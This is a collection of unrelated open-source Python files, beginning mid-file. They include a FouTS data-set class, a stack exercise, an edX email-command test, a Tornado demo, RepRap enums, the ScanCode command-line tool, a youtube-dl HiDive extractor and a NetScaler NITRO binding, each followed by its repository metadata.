self.elems.append(Object(elem_degree))
for elem_elem_i in range(elem_degree):
base = elem_i * 100 + elem_elem_i * 10
self.elems[elem_i].vector[elem_elem_i] = (base + 1, base + 2, base + 3)
for prop_i in range(5):
self.elems[elem_i].prps['ELEM_PROP_' + str(prop_i+1)] = elem_i * 100.0 + (prop_i+1) * .1 + 0.001;
for prop_i in range(5):
self.elem_prp_keys.append('ELEM_PROP_' + str(prop_i+1))
self.prps['PROP_' + str(prop_i+1)] = (prop_i+1) * 1.1 + 0.001
for i in range(1,6):
self.add_extend_elem_prop("EXT_ELEM_PROP_" + str(i),"NaN")
for j in range(len(self.elems)):
self.set_extend_elem_prop("EXT_ELEM_PROP_" + str(i), "Ooogle " + str(i) + "-" + str(j), j)
self.elem_degree = elem_degree
def second_set(self, num_elems, elem_degree):
self.elems = list()
self.prps = dict()
self.extend_prps = dict()
self.elem_prp_keys = list()
self.elem_extend_prps = dict()
for elem_i in range(num_elems):
self.elems.append(Object(elem_degree))
for elem_elem_i in range(elem_degree):
base = elem_i * 100 + elem_elem_i * 10
self.elems[elem_i].vector[elem_elem_i] = (-(base + 1), -(base + 2), -(base + 3))
for prop_i in range(5):
self.elems[elem_i].prps['ELEM_PROP_' + str(prop_i+1)] = -(elem_i * 100.0 + (prop_i+1) * .1 + 0.001);
for prop_i in range(5):
self.elem_prp_keys.append('ELEM_PROP_' + str(prop_i+1))
self.prps['PROP_' + str(prop_i+1)] = -((prop_i+1) * 1.1 + 0.001)
for i in range(6,11):
self.add_extend_elem_prop("EXT_ELEM_PROP_" + str(i),"NaN")
for j in range(len(self.elems)):
self.set_extend_elem_prop("EXT_ELEM_PROP_" + str(i), "Boogle " + str(i) + "-" + str(j), j)
self.elem_degree = elem_degree
def __str__(self):
string = ''
if self.extend_prps:
string = string + '('
for key_val in sorted(self.extend_prps.items()):
string = string + key_val[0] + ': ' + str(key_val[1]) + ', '
if self.extend_prps:
string = string + ')\n'
string = string + '\n'
for (key,val) in sorted(self.prps.items()):
string = string + key + ': ' + str(val) + '\n'
elem_i = 0
for elem in self.elems:
string = string + '\n--------------------\n'
string = string + ' %d\n' % elem_i
string = string + '--------------------\n'
if elem.extend_prps:
string = string + '{'
count = 0
for (key,val) in sorted(elem.extend_prps.items()):
string = string + key + ': ' + str(val)
count = count + 1
if count != len(elem.extend_prps):
string = string + ', '
if elem.extend_prps:
string = string + '}\n'
string = string + '\n'
string = string + str(elem)
string = string + '\n'
elem_i = elem_i + 1
return string
#=====================================================================================================================
# Set functions
#=====================================================================================================================
def elem_resize(self, new_size, value):
for elem_i in range(self.size()):
elem_degree = len(self.elems[elem_i].vector)
for i in range(elem_degree,new_size):
self.elems[elem_i].vector.append((value,value,value))
for i in range(elem_degree-1,new_size-1,-1):
self.elems[elem_i].vector.pop(i)
self.elem_degree = new_size
def push_back(self, elem, ext_prop_row=dict()):
# Make a copy of the element and reset its extended properties
append_elem = deepcopy(elem)
append_elem.extend_prps = dict()
# Loop through the keys present in the set
for key in self.elem_extend_prps.keys():
if ext_prop_row:
# Use the properties explicitly provided
if ext_prop_row.has_key(key):
append_elem.extend_prps[key] = ext_prop_row[key]
else:
append_elem.extend_prps[key] = self.elem_extend_prps[key]
else:
# Copy across only the extended properties present in the set, and populate the missing extended properties with defaults.
if elem.extend_prps.has_key(key):
append_elem.extend_prps[key] = elem.extend_prps[key]
else:
append_elem.extend_prps[key] = self.elem_extend_prps[key]
self.elems.append(append_elem)
def erase(self, index):
self.elems.pop(index)
def insert(self, elem, index):
# Make a copy of the element and reset its extended properties
insert_elem = deepcopy(elem)
insert_elem.extend_prps = dict()
# Loop through the keys present in the set
for key in self.elem_extend_prps.keys():
# Copy across only the extended properties present in the set, and populate the missing extended properties with defaults.
if elem.extend_prps.has_key(key):
insert_elem.extend_prps[key] = elem.extend_prps[key]
else:
insert_elem.extend_prps[key] = self.elem_extend_prps[key]
self.elems.insert(index, insert_elem)
def append(self, set):
if self.elem_prp_keys != set.elem_prp_keys or self.prps != set.prps:
raise UnmatchedPropertiesException ('properties do not match')
if self.elem_degree and self.elem_degree != set.elem_degree:
raise ElemSizeException ('Element sizes do not match')
for elem in set.elems:
self.push_back(elem)
def get_extend_elem_prop_header(self):
return sorted(self.elem_extend_prps.keys())
def get_elem_prop_header(self):
return sorted(self.elem_prp_keys)
def add_extend_elem_prop(self, key, default_value):
if not self.elem_extend_prps.has_key(key):
for elem in self.elems:
elem.extend_prps[key] = default_value
self.elem_extend_prps[key] = default_value
def add_extend_elem_props(self,set):
for (key,val) in set.elem_extend_prps.items():
self.add_extend_elem_prop(key,val)
def clear_extend_elem_props(self):
self.elem_extend_prps = dict()
for elem in self.elems:
elem.extend_prps = dict()
def remove_extend_elem_prop(self, key):
self.elem_extend_prps.pop(key,None)
for elem in self.elems:
elem.extend_prps.pop(key,None)
#######################
def set_extend_elem_prop(self,key,value,index):
self.elems[index].extend_prps[key] = value
def get_extend_elem_prop(self,key,index):
return self.elems[index].extend_prps[key]
def has_extend_elem_prop(self,key):
return self.elem_extend_prps.keys().count(key)
def get_extend_elem_prop_row(self,index):
return self.elems[index].extend_prps
def set_extend_elem_prop_row(self,prop_row,index):
this_props = self.elems[index].extend_prps
# Loop through the keys present in the set
for key in self.elem_extend_prps.keys():
# Copy across only the extended properties present in the set, and populate the missing extended properties with defaults.
if prop_row.has_key(key):
this_props[key] = prop_row[key]
else:
this_props[key] = self.elem_extend_prps[key]
def copy_extend_elem_prop_row(self,set,their_index,this_index):
self.set_extend_elem_prop_row(set.get_extend_elem_prop_row(their_index),this_index)
def copy_extend_elem_props(self,set):
self.elem_extend_prps = copy(set.elem_extend_prps)
for (this_elem,their_elem) in zip(self.elems,set.elems):
this_elem.extend_prps = copy(their_elem.extend_prps)
def append_extend_elem_props(self,set):
for (key,val) in set.elem_extend_prps.items():
# if key not in self.elem_extend_prps:
self.elem_extend_prps[key] = val
for (this_elem,their_elem) in zip(self.elems,set.elems):
this_elem.extend_prps[key] = their_elem.extend_prps[key]
def add_elem_prop(self,key,value):
if key not in self.elem_prp_keys:
self.elem_prp_keys.append(key)
for elem in self.elems:
elem.prps[key] = value
def has_elem_prop(self,key):
return self.elem_prp_keys.count(key)
def remove_elem_prop(self,key,ignore_missing=True):
try:
self.elem_prp_keys.remove(key)
except ValueError:
if not ignore_missing:
raise Exception ("Could not remove element property '%s' as it was not present" % key)
for elem in self.elems:
elem.prps.pop(key,None)
def clear_elem_props(self):
self.elem_prp_keys = list()
for elem in self.elems:
elem.prps = dict()
def elem_prop_index(self,key):
keys = sorted(self.elem_prp_keys)
for i in range(len(keys)):
if keys[i] == key:
return i
raise Exception ("Key (" + key + ") was not found.")
def elem_prop_name(self, index):
keys = sorted(self.elem_prp_keys)
return keys[index]
def elem_prop_keys(self):
keys = sorted(self.elem_prp_keys)
return keys
def freeze_elem_degree(self):
if self.size():
elem_degree = self.elems[0].size()
for elem in self.elems:
if elem.size() != elem_degree:
raise CantBeFrozenException ("Elements not all the same size")
self.elem_degree = elem_degree
def free_elem_degree(self):
self.elem_degree = 0
def resize(self, new_size, fill_value, new_elem_degree=0):
if self.elem_degree:
if new_elem_degree:
raise Exception ("'new_elem_degree' parameter can only be supplied when element size is variable.");
elem_degree = self.elem_degree
else:
elem_degree = new_elem_degree
old_size = self.size()
for i in range(old_size,new_size):
object = Object(elem_degree,fill_value)
for key in self.elem_prp_keys:
object.prps[key] = fill_value
for (key,val) in self.elem_extend_prps.items():
object.extend_prps[key] = val
self.elems.append(object)
for i in range(old_size-1,new_size-1,-1):
self.elems.pop(i)
def clear(self):
self.elems = list()
self.extend_prps = dict()
self.elem_extend_prps = dict()
def size(self):
return len(self.elems)
def num_props(self):
return len(self.prps)
def num_elem_props(self):
return len(self.elem_prp_keys)
def num_extend_elem_props(self):
return len(self.elem_extend_prps)
def vsize(self):
return self.bsize() + self.num_props()
def bsize(self):
base_size = 0
for elem in self.elems:
base_size = base_size + elem.size() * 3 + elem.num_props()
return base_size
def add_prop(self, prop_key,value):
if self.prps.has_key(prop_key):
raise Exception ("'" + prop_key + "' property already present.")
self.prps[prop_key] = value
def has_prop(self, prop_key):
return int(self.prps.has_key(prop_key))
def remove_prop(self, prop_key):
if self.prps.pop(prop_key,-9999) == -9999:
raise Exception ("key + (" + prop_key + ") was not found, use 'ignore_missing' to ignore.")
def clear_props(self):
self.prps.clear()
def prop_index(self, prop_key):
keys = sorted(self.prps.keys())
for prop_i in range(len(keys)):
if prop_key == keys[prop_i]:
return prop_i
raise Exception ("Key '" + str(prop_key) + "' not found.")
# def prop(self, index):
#
# keys = sorted(self.prps.keys())
#
# return self.prps[keys[index]]
def prop_name(self, index):
return sorted(self.prps.keys())[index]
def prop_keys(self):
return sorted(self.prps.keys())
def prop(self, key):
return self.prps[key]
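# Minimal usage sketch (assumes the sibling object.py module providing Object;
# the sizes are arbitrary):
#
#   s1, s2 = Set(), Set()
#   s1.first_set(num_elems=3, elem_degree=2)
#   s2.first_set(num_elems=2, elem_degree=2)
#   s1.append(s2)      # raises UnmatchedPropertiesException on a mismatch
#   print(s1.size())   # -> 5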
| tclose/FouTS | python/fouts/fibre/base/set.py | Python | gpl-3.0 | 13,285 |
# pylint: disable=R0903
"""
Write a program which implements a stack interface for integers. The interface
should have ‘push’ and ‘pop’ functions. Your task is to ‘push’ a series of
integers and then ‘pop’ and print every alternate integer.
INPUT SAMPLE:
Your program should accept a file as its first argument. The file contains a
series of space delimited integers, one per line.
For example:
1 2 3 4
10 -2 3 4
OUTPUT SAMPLE:
Print to stdout every alternate space delimited integer, one per line.
For example:
4 2
4 -2
"""
from sys import argv
INPUT_FILE = argv[1]
def parse_input(input_file):
"""Read each line of a file and do stuff with it"""
with open(input_file, mode="r") as file:
for line in file:
ints = [int(x) for x in line.split()]
working_stack = Stack()
# Push the numbers, pop off and print the alternates
pointer = 1 # used to determine "every other" status
for number in ints:
working_stack.push(number)
while True:
try:
if pointer % 2: # print only odd number pointer items
print(working_stack.pop(), end=" ")
else:
working_stack.pop()
pointer += 1
except ValueError:
break
print()
class Stack:
"""Implements a stack data structure"""
def __init__(self):
self.top = None
def push(self, data):
"""Take a data element and put it on the top of the stack"""
self.top = Item(data, self.top)
def pop(self):
"""Remove the top item from the stack, and return the value of it"""
prev_top = self.top
try:
self.top = self.top.next_item
except AttributeError:
raise ValueError("The stack is empty")
return prev_top.data
class Item:
"""Wrapper for a data item that get pushed on the stack"""
def __init__(self, data, next_item=None):
self.data = data
self.next_item = next_item
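# Quick interactive sketch of the Stack defined above (values illustrative):
#
#   s = Stack()
#   s.push(1); s.push(2); s.push(3)
#   s.pop()   # -> 3 (LIFO order)
#   s.pop()   # -> 2
#   # popping an empty stack raises ValueError("The stack is empty")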
if __name__ == '__main__':
parse_input(INPUT_FILE)
| joelstanner/codeeval | python_solutions/STACK_IMPLEMENTATION/stack_implementation.py | Python | mit | 2,183 |
"""
Tests for send_email_base_command
"""
import datetime
from unittest import skipUnless
import ddt
import pytz
from django.conf import settings
from mock import DEFAULT, Mock, patch
from openedx.core.djangoapps.schedules.management.commands import SendEmailBaseCommand
from openedx.core.djangoapps.site_configuration.tests.factories import SiteConfigurationFactory, SiteFactory
from openedx.core.djangolib.testing.utils import CacheIsolationTestCase, skip_unless_lms
@ddt.ddt
@skip_unless_lms
@skipUnless('openedx.core.djangoapps.schedules.apps.SchedulesConfig' in settings.INSTALLED_APPS,
"Can't test schedules if the app isn't installed")
class TestSendEmailBaseCommand(CacheIsolationTestCase): # lint-amnesty, pylint: disable=missing-class-docstring
def setUp(self): # lint-amnesty, pylint: disable=super-method-not-called
self.command = SendEmailBaseCommand()
self.site = SiteFactory()
self.site_config = SiteConfigurationFactory.create(site=self.site)
def test_handle(self):
with patch.object(self.command, 'send_emails') as send_emails:
self.command.handle(site_domain_name=self.site.domain, date='2017-09-29')
send_emails.assert_called_once_with(
self.site,
datetime.datetime(2017, 9, 29, tzinfo=pytz.UTC),
None
)
def test_weeks_option(self):
with patch.object(self.command, 'enqueue') as enqueue:
self.command.handle(site_domain_name=self.site.domain, date='2017-09-29', weeks=12)
assert enqueue.call_count == 12
def test_send_emails(self):
with patch.multiple(
self.command,
offsets=(1, 3, 5),
enqueue=DEFAULT,
):
arg = Mock(name='arg')
kwarg = Mock(name='kwarg')
self.command.send_emails(arg, kwarg=kwarg)
assert not arg.called
assert not kwarg.called
for offset in self.command.offsets:
self.command.enqueue.assert_any_call(offset, arg, kwarg=kwarg) # lint-amnesty, pylint: disable=no-member
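# For context: concrete subclasses of SendEmailBaseCommand are normally run as
# Django management commands, roughly (command name and domain hypothetical):
#
#   ./manage.py lms send_recurring_nudge example.com --date 2017-09-29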
| stvstnfrd/edx-platform | openedx/core/djangoapps/schedules/management/commands/tests/test_send_email_base_command.py | Python | agpl-3.0 | 2,135 |
import textwrap
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
# Just learning Yo!
from tornado.options import define, options
define("port", default=8000, help="run on the given port", type=int)
# Handlers that manipulate strings
class ReverseHandler(tornado.web.RequestHandler):
def get(self, input):
self.write(input[::-1])
class WrapHandler(tornado.web.RequestHandler):
def post(self):
text = self.get_argument('text')
width = self.get_argument('width', 40)
self.write(textwrap.fill(text, width))
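# Example requests against the handlers above (curl syntax; port 8000 matches
# the "port" option default):
#
#   curl http://localhost:8000/reverse/stressed              # -> desserts
#   curl -d "text=hello world&width=5" http://localhost:8000/wrap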
# Run only if started as the main file
if __name__ == "__main__":
tornado.options.parse_command_line()
app = tornado.web.Application(
handlers=[
(r"/reverse/(\w+)", ReverseHandler),
(r"/wrap", WrapHandler)
]
)
    http_server = tornado.httpserver.HTTPServer(app)
    http_server.listen(options.port)
    tornado.ioloop.IOLoop.instance().start()
| Wojtechnology/Muzit | learning/strings.py | Python | apache-2.0 | 908 |
class RepRapEventEnum:
PRINT_COMPLETE = 10
PRINT_STOPPED = 11
PRINT_STARTED = 13
PRINT_RESUMED = 14
PRINT_SENDGCODE = 15
QUEUE_DRAINED = 16
RECEIVED_MSG = 17
CONNECTED = 20
DISCONNECTED = 21
PRINT_ERROR = 99
class RepRapCmdEnum:
CMD_GCODE = 1
CMD_STARTPRINT = 2
CMD_STOPPRINT = 3
CMD_DRAINQUEUE = 4
CMD_ENDOFPRINT = 5
CMD_RESUMEPRINT = 6
class RepRapLogEnum:
LOG_NONE = 0
LOG_CMD = 1
	LOG_ALL = 2
| jbernardis/repraptoolbox | src/reprapenums.py | Python | gpl-3.0 | 417 |
#
# Copyright (c) 2015 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import print_function, absolute_import
import os
from functools import partial
import json
import click
from commoncode.fileutils import file_iter
from commoncode import ignore
from scancode import __version__ as version
from scancode.api import as_html
from scancode.api import as_html_app
from scancode.api import create_html_app_assets
from scancode.api import extract_archives
from scancode.api import get_copyrights
from scancode.api import get_licenses
from scancode.api import HtmlAppAssetCopyWarning
from scancode.api import HtmlAppAssetCopyError
info_text = '''
ScanCode scans code and other files for origin and license.
Visit https://github.com/nexB/scancode-toolkit/ for support and download.
'''
# FIXME: we should load NOTICE instead
notice_text = '''
Software license
================
Copyright (c) 2015 nexB Inc. and others. All rights reserved.
http://nexb.com and https://github.com/nexB/scancode-toolkit/
The ScanCode software is licensed under the Apache License version 2.0.
Data generated with ScanCode require an acknowledgment.
ScanCode is a trademark of nexB Inc.
You may not use this software except in compliance with the License.
You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed
under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
When you publish or redistribute any data created with ScanCode or any ScanCode
derivative work, you must accompany this data with the following acknowledgment:
'''
acknowledgment_text = '''
Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
OR CONDITIONS OF ANY KIND, either express or implied. No content created from
ScanCode should be considered or used as legal advice. Consult an Attorney
for any legal advice.
ScanCode is a free software code scanning tool from nexB Inc. and others.
Visit https://github.com/nexB/scancode-toolkit/ for support and download.
'''
acknowledgment_text_json = acknowledgment_text.strip().replace(' ', '')
extra_notice_text = '''
Third-party software licenses
=============================
ScanCode embeds third-party free and open source software packages under various
licenses including copyleft licenses. Some of the third-party software packages
are delivered as pre-built binaries. The origin and license of these packages is
documented by .ABOUT files.
The corresponding source code for pre-compiled third-party software is available
for immediate download from the same release page where you obtained ScanCode at:
https://github.com/nexB/scancode-toolkit/
or https://github.com/nexB/scancode-thirdparty-src/
You may also contact us to request the source code by email at info@nexb.com or
by postal mail at:
nexB Inc., ScanCode open source code request
735 Industrial Road, Suite #101, 94070 San Carlos, CA, USA
Please indicate in your communication the ScanCode version for which you are
requesting source code.
License for ScanCode datasets
=============================
ScanCode includes datasets (e.g. for license detection) that are dedicated
to the Public Domain using the Creative Commons CC0 1.0 Universal (CC0 1.0)
Public Domain Dedication: http://creativecommons.org/publicdomain/zero/1.0/
'''
def print_about(ctx, param, value):
if not value or ctx.resilient_parsing:
return
click.echo(info_text + notice_text + acknowledgment_text + extra_notice_text)
ctx.exit()
examples_text = '''
Scancode command lines examples:
(Note for Windows: use '\\' back slash instead of '/' forward slash for paths.)
Scan the 'samples' directory for licenses and copyrights. Save scan results to
an HTML app file for interactive scan results navigation. When the scan is done,
open 'scancode_result.html' in your web browser. Note that additional app files
are saved in a directory named 'scancode_result_files':
scancode --format html-app samples/ scancode_result.html
Scan a directory for licenses and copyrights. Save scan results to an
HTML file:
scancode --format html samples/zlib scancode_result.html
Scan a single file for copyrights. Print scan results on terminal as JSON:
scancode --copyright samples/zlib/zlib.h
Scan a single file for licenses, print verbose progress on terminal as each file
is scanned. Save scan to a JSON file:
scancode --license --verbose samples/zlib/zlib.h licenses.json
Scan a directory explicitly for licenses and copyrights. Redirect JSON scan
results to a file:
scancode -f json -l -c samples/zlib/ > scan.json
Extract all archives found in the 'samples' directory tree:
scancode --extract samples
Note: If an archive contains other archives, all contained archives will be
extracted recursively. Extraction is done directly in the 'samples' directory,
side-by-side with each archive. Files are extracted in a directory named after
the archive with an '-extract' suffix added to its name, created side-by-side
with the corresponding archive file.
Extract a single archive. Files are extracted in the directory
'samples/arch/zlib.tar.gz-extract/':
scancode --extract samples/arch/zlib.tar.gz
'''
def print_examples(ctx, param, value):
if not value or ctx.resilient_parsing:
return
click.echo(examples_text)
ctx.exit()
def print_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
click.echo('ScanCode version ' + version)
ctx.exit()
epilog_text = '''\b\bExamples (use --examples for more):
\b
Scan the 'samples' directory for licenses and copyrights.
Save scan results to a JSON file:
scancode --format json samples scancode_result.json
\b
Scan the 'samples' directory for licenses and copyrights. Save scan results to
an HTML app file for interactive web browser results navigation. Additional app
files are saved to the 'myscan_files' directory:
scancode --format html-app samples myscan.html
Note: when you run scancode, a progress bar is displayed with a counter of the
number of files processed. Use --verbose to display file-by-file progress.
'''
short_help = '''Usage: scancode [OPTIONS] <input> <output_file>
Try 'scancode --help' for help on options and arguments.'''
formats = ['json', 'html', 'html-app']
class ScanCommand(click.Command):
"""
Workaround click 4.0 bug https://github.com/mitsuhiko/click/issues/365
"""
def get_usage(self, ctx):
return short_help
@click.command(name='scancode', epilog=epilog_text, cls=ScanCommand)
@click.pass_context
@click.argument('input', metavar='<input>', type=click.Path(exists=True, readable=True))
@click.argument('output_file', default='-', metavar='<output_file>', type=click.File('wb'))
@click.option('-c', '--copyright', is_flag=True, default=False, help='Scan <input> for copyrights. [default]')
@click.option('-l', '--license', is_flag=True, default=False, help='Scan <input> for licenses. [default]')
@click.option('-f', '--format', metavar='<style>', type=click.Choice(formats),
default='json', show_default=True,
help='Set <output_file> format <style> to one of: %s' % ' or '.join(formats),
)
@click.option('-e', '--extract', is_flag=True, default=False, is_eager=True,
help=('Extract any archives and compressed files found in <input> recursively, in-place, ignoring other scan options. Use this before scanning proper, as an <input> preparation step.'))
@click.option('--verbose', is_flag=True, default=False, help='Print verbose file-by-file progress messages.')
@click.help_option('-h', '--help')
@click.option('--examples', is_flag=True, is_eager=True, callback=print_examples,
help=('Show command examples and exit.'))
@click.option('--about', is_flag=True, is_eager=True, callback=print_about,
help=('Show information about ScanCode and licensing and exit.'))
@click.option('--version', is_flag=True, is_eager=True, callback=print_version,
help=('Show the version and exit.'))
def scancode(ctx, input, output_file, extract, copyright, license, format, verbose, *args, **kwargs):
"""scan the <input> file or directory for origin and license and save results to the <output_file>.
The scan results are printed on terminal if <output_file> is not provided.
"""
abs_input = os.path.abspath(os.path.expanduser(input))
scans = [copyright, license]
if extract:
if any(scans):
# exclusive, ignoring other options.
# FIXME: this should turned into a sub-command
ctx.fail('''The '--extract' option cannot be combined with other scanning options.
Use the '--extract' option alone to extract archives found in <input>.
then run scancode again to scan the extracted files.''')
ctx.exit(1)
click.secho('Extracting archives...', fg='green')
extract_with_progress(abs_input, verbose)
click.secho('Extracting done.', fg='green')
return
# Default scan when no options is provided
if not any(scans):
copyright = True
license = True
if copyright or license:
click.secho('Scanning files...', fg='green')
results = []
ignored = partial(ignore.is_ignored, ignores=ignore.ignores_VCS, unignores={})
files = file_iter(abs_input, ignored=ignored)
if not verbose:
# only display a progress bar
with click.progressbar(files, show_pos=True) as files:
for input_file in files:
results.append(scan_one(input_file, copyright, license, verbose))
else:
            for input_file in files:
results.append(scan_one(input_file, copyright, license, verbose))
if format == 'html':
output_file.write(as_html(results))
elif format == 'html-app':
output_file.write(as_html_app(results, input, output_file))
try:
create_html_app_assets(output_file)
except HtmlAppAssetCopyWarning:
click.secho('\nHTML app creation skipped when printing to terminal.',
fg='yellow')
except HtmlAppAssetCopyError:
click.secho('\nFailed to create HTML app.', fg='red')
elif format == 'json':
meta = {
'count': len(results),
'notice': acknowledgment_text_json,
'results': results,
'version': version,
}
output_file.write(json.dumps(meta, indent=2, sort_keys=True))
else:
# This should never happen by construction
raise Exception('Unknown format: ' + repr(format))
click.secho('Scanning done.', fg='green')
def scan_one(input_file, copyright, license, verbose=False):
"""
Scan one file and return scanned data.
"""
if verbose:
click.secho('Scanning: %(input_file)s: ' % locals(), nl=False, fg='blue')
data = {'location': input_file}
if copyright:
if verbose:
click.secho('copyrights. ', nl=False, fg='green')
data['copyrights'] = list(get_copyrights(input_file))
if license:
if verbose:
click.secho('licenses. ', nl=False, fg='green')
data['licenses'] = list(get_licenses(input_file))
if verbose:
click.secho('', nl=True)
return data
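# For reference, a scan_one() result is a plain dict shaped like this sketch
# (path and findings hypothetical):
#
#   {'location': '/tmp/zlib.h',
#    'copyrights': [...],   # present when copyright=True
#    'licenses': [...]}     # present when license=True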
def extract_with_progress(input, verbose=False):
"""
Extract archives and display progress.
"""
if verbose:
for xev in extract_archives(input, verbose=verbose):
if not xev.done:
click.secho('Extracting: ' + xev.source + ': ', nl=False, fg='green')
else:
if xev.warnings or xev.errors:
click.secho('done.', fg='red' if xev.errors else 'yellow')
display_extract_event(xev)
else:
click.secho('done.', fg='green')
else:
extract_results = []
# only display a progress bar
with click.progressbar(extract_archives(input, verbose=verbose), show_pos=True) as extractions:
for xevent in extractions:
extract_results.append(xevent)
# display warnings/errors at the end
for xev in extract_results:
if xev.warnings or xev.errors:
if xev.warnings or xev.errors:
click.secho('Extracting: ' + xev.source + ': ', nl=False, fg='green')
click.secho('done.', fg='red' if xev.errors else 'yellow')
display_extract_event(xev)
def display_extract_event(xev):
for e in xev.errors:
click.secho(' ERROR: ' + e, fg='red')
for warn in xev.warnings:
click.secho(' WARNING: ' + warn, fg='yellow')
| retrography/scancode-toolkit | src/scancode/cli.py | Python | apache-2.0 | 14,382 |
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..compat import compat_str
from ..utils import (
ExtractorError,
int_or_none,
urlencode_postdata,
)
class HiDiveIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?hidive\.com/stream/(?P<title>[^/]+)/(?P<key>[^/?#&]+)'
# Using X-Forwarded-For results in 403 HTTP error for HLS fragments,
# so disabling geo bypass completely
_GEO_BYPASS = False
_TESTS = [{
'url': 'https://www.hidive.com/stream/the-comic-artist-and-his-assistants/s01e001',
'info_dict': {
'id': 'the-comic-artist-and-his-assistants/s01e001',
'ext': 'mp4',
'title': 'the-comic-artist-and-his-assistants/s01e001',
'series': 'the-comic-artist-and-his-assistants',
'season_number': 1,
'episode_number': 1,
},
'params': {
'skip_download': True,
},
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
title, key = mobj.group('title', 'key')
video_id = '%s/%s' % (title, key)
settings = self._download_json(
'https://www.hidive.com/play/settings', video_id,
data=urlencode_postdata({
'Title': title,
'Key': key,
}))
restriction = settings.get('restrictionReason')
if restriction == 'RegionRestricted':
self.raise_geo_restricted()
if restriction and restriction != 'None':
raise ExtractorError(
'%s said: %s' % (self.IE_NAME, restriction), expected=True)
formats = []
subtitles = {}
for rendition_id, rendition in settings['renditions'].items():
bitrates = rendition.get('bitrates')
if not isinstance(bitrates, dict):
continue
m3u8_url = bitrates.get('hls')
if not isinstance(m3u8_url, compat_str):
continue
formats.extend(self._extract_m3u8_formats(
m3u8_url, video_id, 'mp4', entry_protocol='m3u8_native',
m3u8_id='%s-hls' % rendition_id, fatal=False))
cc_files = rendition.get('ccFiles')
if not isinstance(cc_files, list):
continue
for cc_file in cc_files:
if not isinstance(cc_file, list) or len(cc_file) < 3:
continue
cc_lang = cc_file[0]
cc_url = cc_file[2]
if not isinstance(cc_lang, compat_str) or not isinstance(
cc_url, compat_str):
continue
subtitles.setdefault(cc_lang, []).append({
'url': cc_url,
})
season_number = int_or_none(self._search_regex(
r's(\d+)', key, 'season number', default=None))
episode_number = int_or_none(self._search_regex(
r'e(\d+)', key, 'episode number', default=None))
return {
'id': video_id,
'title': video_id,
'subtitles': subtitles,
'formats': formats,
'series': title,
'season_number': season_number,
'episode_number': episode_number,
}
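# Usage note: as a youtube-dl extractor this is exercised end to end with a
# stream URL (hypothetical slug), e.g.:
#
#   youtube-dl "https://www.hidive.com/stream/some-show/s01e001"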
| steebchen/youtube-dl | youtube_dl/extractor/hidive.py | Python | unlicense | 3,324 |
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class rnat6_binding(base_resource):
""" Binding class showing the resources that can be bound to rnat6_binding.
"""
def __init__(self) :
self._name = ""
self.rnat6_nsip6_binding = []
@property
def name(self) :
"""Name of the RNAT6 rule whose details you want to display.<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
"""Name of the RNAT6 rule whose details you want to display.<br/>Minimum length = 1
"""
try :
self._name = name
except Exception as e:
raise e
@property
def rnat6_nsip6_bindings(self) :
"""nsip6 that can be bound to rnat6.
"""
try :
return self._rnat6_nsip6_binding
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(rnat6_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.rnat6_binding
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.name) :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def get(self, service, name) :
""" Use this API to fetch rnat6_binding resource.
"""
try :
if type(name) is not list :
obj = rnat6_binding()
obj.name = name
response = obj.get_resource(service)
else :
if name and len(name) > 0 :
					obj = [rnat6_binding() for _ in range(len(name))]
					# `response` was never initialized before the indexed writes below;
					# pre-size it so the loop cannot raise a NameError
					response = [None] * len(name)
					for i in range(len(name)) :
						obj[i].name = name[i];
						response[i] = obj[i].get_resource(service)
return response
except Exception as e:
raise e
class rnat6_binding_response(base_response) :
def __init__(self, length=1) :
self.rnat6_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
